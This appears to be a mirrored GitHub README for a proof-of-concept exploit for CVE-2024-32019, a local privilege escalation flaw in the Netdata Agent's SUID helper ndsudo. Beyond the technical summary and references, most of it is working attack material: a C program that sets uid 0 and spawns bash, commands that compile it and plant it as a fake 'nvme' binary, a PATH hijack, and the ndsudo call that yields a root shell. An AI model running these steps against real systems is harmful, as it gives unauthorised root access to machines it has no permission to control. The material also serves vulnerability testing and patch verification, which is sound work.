来源

关联漏洞

描述

CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.

介绍

# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019:
  Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)

文件快照

 [4.0K]  /data/pocs/7aa722bd1472cb681ee868e1183b2f4a31cf49dc
├── [9.5K]  CVE-2024-32019-dbs.py
├── [4.0K]  images
│   └── [203K]  image.png
└── [2.6K]  README.md

1 directory, 3 files

备注